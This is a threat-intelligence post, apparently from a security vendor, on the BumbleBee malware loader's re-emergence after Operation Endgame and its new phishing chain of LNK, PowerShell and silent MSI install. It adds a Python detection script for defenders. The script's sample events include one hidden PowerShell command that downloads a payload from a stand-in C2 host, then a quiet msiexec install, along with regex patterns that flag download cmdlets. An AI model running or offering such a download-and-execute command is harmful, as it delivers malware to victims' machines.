Related Families: BazarLoader, BazaLoader
Executive Summary
BumbleBee is a sophisticated loader. It was first seen in the wild in 2022 and was a replacement for BazarLoader. It recently re-emerged with a new infection chain, indicating an evolving threat.
Key Takeaways
- BumbleBee is a sophisticated loader.
- It was first seen in the wild in 2022 and was a replacement for BazarLoader.
- Despite disruption of malware operations by law enforcement in May 2024, BumbleBee recently re-emerged with a new infection chain.
- Due to the re-emergence of BumbleBee and its shift in TTPs, PolySwarm analysts consider BumbleBee to be an evolving threat.
What is BumbleBee?
BumbleBee is a sophisticated loader that was first seen in the wild in 2022 as a replacement for BazarLoader. Threat actors obtain access to corporate networks and use BumbleBee to deliver follow-on payloads, including Cobalt Strike beacons and ransomware. It recently re-emerged with a new infection chain, indicating an evolving threat. Netskope reported on this activity.
Conducted earlier this year, Operation Endgame, a Europol operation, was the largest law enforcement operation to target botnets. Its scope included the takedown of IcedID, SystemBC, Pikabot, Smokeloader, Trickbot, and BumbleBee. Operation Endgame focused on disrupting malware operations, dismantling their infrastructure, freezing proceeds, and arresting key figures associated with the malware. The operation was successful at the time, resulting in 4 arrests, 16 location searches, the takedown or disruption of over 100 servers, and the seizure of over 2000 domains.
Despite taking a heavy hit from Operation Endgame in May, BumbleBee appears to be back in business. Along with this renewed activity, BumbleBee is also using a new infection chain. The chain begins with a phishing email that lures the victim into downloading and extracting a ZIP file and then executing the LNK file inside it. When executed, the LNK file begins the next phase of infection, which results in the BumbleBee payload being downloaded and executed in memory. This method allows the malware to avoid writing the DLL to disk.
When the LNK file is opened, it executes a PowerShell command that downloads an MSI file from the C2 and renames it. The MSI file is then installed and executed using msiexec.exe. The threat actors use the /qn option so that no user interaction is required for this final step. Using MSI files to execute payloads is not a new concept; multiple malware families, including DarkGate and Latrodectus, are known to use this method. However, it is a new TTP for BumbleBee.
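To show how a defender might look for this chain in endpoint telemetry, here is an added Python example (not part of the PolySwarm or Netskope analysis) that scores constructed Sysmon-style process-creation events for the sequence described above: PowerShell launched from explorer.exe with a download cmdlet, followed by msiexec.exe installing a package from a user-writable path with /qn. The event fields, sample command lines, and severity labels are assumptions.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr http://c2.example.invalid/p.bin -OutFile $env:TEMP\setup.msi"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\setup.msi /qn"},
    # Benign: the Windows Installer service being started by services.exe.
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
]

DOWNLOAD_PRIMITIVE = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer)", re.I)
QUIET_FLAG = re.compile(r"(?<!\S)/(qn|quiet)\b", re.I)            # /qn or /quiet: no UI, no user interaction
INSTALL_ARG = re.compile(r'(?<!\S)/(i|package)\s+"?([^"\s]+)', re.I)  # package path after /i or /package
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Public|ProgramData)\\", re.I)
SHELLS = ("powershell.exe", "pwsh.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def powershell_download_from_explorer(ev):
    """PowerShell spawned by explorer.exe (what an LNK double-click looks like) that pulls a file from the network."""
    return (basename(ev["image"]) in SHELLS and basename(ev["parent"]) == "explorer.exe"
            and bool(DOWNLOAD_PRIMITIVE.search(ev["cmdline"])))


def quiet_msi_install_from_user_path(ev):
    """msiexec.exe installing a package from a user-writable location with the quiet flag set."""
    if basename(ev["image"]) != "msiexec.exe":
        return False
    m = INSTALL_ARG.search(ev["cmdline"])
    return bool(m and QUIET_FLAG.search(ev["cmdline"]) and USER_WRITABLE.search(m.group(2)))


def analyse(events):
    """Return (index, severity, rule) findings; a quiet MSI install whose parent is PowerShell is escalated."""
    findings = []
    for i, ev in enumerate(events):
        if powershell_download_from_explorer(ev):
            findings.append((i, "medium", "powershell_download_from_explorer"))
        elif quiet_msi_install_from_user_path(ev):
            severity = "high" if basename(ev["parent"]) in SHELLS else "medium"
            findings.append((i, severity, "quiet_msi_install_user_path"))
    return findings
```

Feeding real Sysmon or EDR process-creation records into analyse() in the same three-field shape is enough to reuse the rules; the path and flag patterns are where local tuning will be needed.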
Due to the re-emergence of BumbleBee and its shift in TTPs, PolySwarm analysts consider BumbleBee to be an evolving threat.
IOCs
PolySwarm has multiple samples of BumbleBee.
You can use the following CLI command to search for all BumbleBee samples in our portal:
$ polyswarm link list -f BumbleBee